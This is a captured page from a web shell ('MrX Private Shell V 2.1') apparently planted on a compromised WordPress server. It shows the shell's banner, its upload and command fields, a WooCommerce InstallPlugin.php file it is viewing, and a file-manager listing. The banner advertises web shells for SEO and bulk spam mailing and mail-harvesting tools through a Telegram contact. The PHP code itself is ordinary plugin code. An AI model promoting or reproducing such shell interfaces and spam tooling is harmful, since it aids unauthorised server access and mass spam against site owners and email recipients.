__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

namespace Automattic\WooCommerce\Blueprint\Steps;

/**
 * Class InstallPlugin
 *
 * This class represents a step in the installation process of a WooCommerce plugin.
 * It includes methods to prepare the data for the plugin installation step and to provide
 * the schema for the JSON representation of this step.
 *
 * @package Automattic\WooCommerce\Blueprint\Steps
 */
class InstallPlugin extends Step {
	/**
	 * The slug of the plugin to be installed.
	 *
	 * @var string The slug of the plugin to be installed.
	 */
	private string $slug;

	/**
	 * The resource URL or path to the plugin's ZIP file.
	 *
	 * @var string The resource URL or path to the plugin's ZIP file.
	 */
	private string $resource;

	/**
	 * Additional options for the plugin installation.
	 *
	 * @var array Additional options for the plugin installation.
	 */
	private array $options;

	/**
	 * InstallPlugin constructor.
	 *
	 * @param string $slug The slug of the plugin to be installed.
	 * @param string $resource The resource URL or path to the plugin's ZIP file.
	 * @param array  $options Additional options for the plugin installation.
	 */
	// phpcs:ignore
	public function __construct( $slug, $resource, array $options = array() ) {
		$this->slug     = $slug;
		$this->resource = $resource;
		$this->options  = $options;
	}

	/**
	 * Prepares an associative array for JSON encoding.
	 *
	 * @return array Array representing this installation step.
	 */
	public function prepare_json_array(): array {
		return array(
			'step'       => static::get_step_name(),
			'pluginData' => array(
				'resource' => $this->resource,
				'slug'     => $this->slug,
			),
			'options'    => $this->options,
		);
	}

	/**
	 * Returns the schema for the JSON representation of this step.
	 *
	 * @param int $version The version of the schema to return.
	 * @return array The schema array.
	 */
	public static function get_schema( int $version = 1 ): array {
		return array(
			'type'       => 'object',
			'properties' => array(
				'step'       => array(
					'type' => 'string',
					'enum' => array( static::get_step_name() ),
				),
				'pluginData' => array(
					'anyOf' => array(
						require __DIR__ . '/schemas/definitions/VFSReference.php',
						require __DIR__ . '/schemas/definitions/LiteralReference.php',
						require __DIR__ . '/schemas/definitions/CorePluginReference.php',
						require __DIR__ . '/schemas/definitions/CoreThemeReference.php',
						require __DIR__ . '/schemas/definitions/UrlReference.php',
						require __DIR__ . '/schemas/definitions/GitDirectoryReference.php',
						require __DIR__ . '/schemas/definitions/DirectoryLiteralReference.php',
					),
				),
				'options'    => array(
					'type'       => 'object',
					'properties' => array(
						'activate' => array(
							'type' => 'boolean',
						),
					),
				),
			),
			'required'   => array( 'step', 'pluginData' ),
		);
	}

	/**
	 * Returns the name of this step.
	 *
	 * @return string The step name.
	 */
	public static function get_step_name(): string {
		return 'installPlugin';
	}
}

Filemanager

Name Type Size Permission Actions
schemas Folder 0775
ActivatePlugin.php File 1.97 KB 0664
ActivateTheme.php File 1.53 KB 0664
InstallPlugin.php File 3 KB 0664
InstallTheme.php File 2.99 KB 0664
RunSql.php File 1.89 KB 0664
SetSiteOptions.php File 1.19 KB 0664
Step.php File 1.42 KB 0664
Filemanager